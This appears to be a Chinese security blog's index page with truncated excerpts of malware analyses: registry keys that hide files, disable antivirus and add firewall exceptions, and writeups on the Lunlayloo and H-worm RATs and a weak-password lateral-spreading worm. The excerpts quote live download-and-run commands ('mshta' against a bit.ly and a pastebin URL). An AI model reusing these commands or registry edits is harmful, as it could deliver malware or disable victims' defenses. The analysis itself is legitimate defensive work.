Shellcode基础
注册表文件隐藏[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]CheckedValue = 0 //此时无法通过文件夹选项设置成功CheckedValue = 1 //Windows默认值把CheckedValue修改成Windows默认值1后,系统恢复正常。
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden]这个对隐藏文件有用
关闭杀软[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Feature]
网络相关[SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
safe
2019-11-03
木马
Lunlayloo 木马
基本信息
FileName
FileType
MD5
Size
Order____679873892.xls
rat
7641FEF8ABC7CB24B66655D11EF3DAF2
41472 bytes
简介该样本语言类型为 VBS和JS编写,中间过程完全使用无文件格式,内容也都能随时在线更改,在一定程序上能躲避安全软件的查杀,通过不同混淆更容易达到免杀的效果。
流程图
详细分析文件有宏,且宏有密码,可以使用offkey直接更改宏密码进入宏代码后在shell(fun)处下断,可以拿到shell 的连接地址 mshta http://bit.ly/8hsshjahassahsh
打开这个页面看似是一个正常页面,但仔细查找是能在源码中找到恶意js代码的拿出来使用console打印出来处理后执行了WScript.Shell.Run mshta http://www.pastebin.com/raw/nv5d9pYu,vbHide看看究竟是什么东西木马作者选择了一个匿名代码存放地址网站,来逃避追踪。但是目前这个RWA地址页面已经被删除了这个样本在any.run上有人运行过,有
2019-09-06
样本详细分析
Rat H-worm
H-WORM变种远控分析
基本信息
FileName
FileType
MD5
Size
4gdrwceq60b7dbl.sct
rat
69B7D326575C5616D82645960B3D081A
403845 bytes
简介该样本语言类型为 VBS和JS编写,在一定程序上能躲避安全软件的查杀,通过不同混淆更容易达到免杀的效果。
流程图
详细分析这个样本母体总共会释放3个脚本
脚本1首先我们看看4gdrwceq60b7dbl.sct,这个样本的母体,是一个sct格式的文件这是Visual FoxPro的表单配置文件我们用Sublimi Text来打开它,记事本也是可以的。
利用组数来存关键字符串,通过字符串的拼接来合成完整路径会尝试删除%APPDATA%\\taskmgr.js 这个文件文件中有很长一段密文,这里我改名为了EncodeList,通过System.IO.MemoryStream.WriteByte()方法把数据读入数据流中。最重要的是使用ADODB.Stream类方法把这个数据流保存到了被上面删除掉的%APPDATA%\\taskmgr.js文件中最后使用WScript.S
2019-09-04
样本详细分析
Rat H-worm
弱口令横向传播
@[toc]
基本信息
FileName
FileType
MD5
Size
sample.exe
rat
4D049BC19B03572EF8A00980050BAFFF
28160 bytes
简介此木马拥有横向传播能力扫描局域网主机,利用弱口令尝试登陆,上传运行自身,这样来传播。该木马会获取并上传被害者系统配置,方便进一步攻击,木马中有接收命令,执行命令的模块,也是这个木马的核心,达到执行作者发过来的命令该木马主要使用壳伪装自己,让安全软件不能找到敏感关键字符串,从而躲避安全软件的查杀。
流程图
详细分析程序加了两个壳,一个压缩壳UPX,一个Armadillo 都能用PEID插件脱掉
点击脱壳之后修复下导入表就好了,修复之后查壳效果
静态分析导入函数还有很多字符串就不列了,格式都是这种。从字符串中能看出,该样本有命令执行,联网,创建服务,处理资源数据,操作注册表的功能基本也就能猜测是释放资源段文件到新文件,然后加入服务启动,来达到启动的目的,下面看啊可能具体操作。
动态加IDA该样本定义大量局部变量,使用硬编码方式存储数据移动到ascii上,右键char就可以看到字
2019-09-02
样本详细分析
malware Rat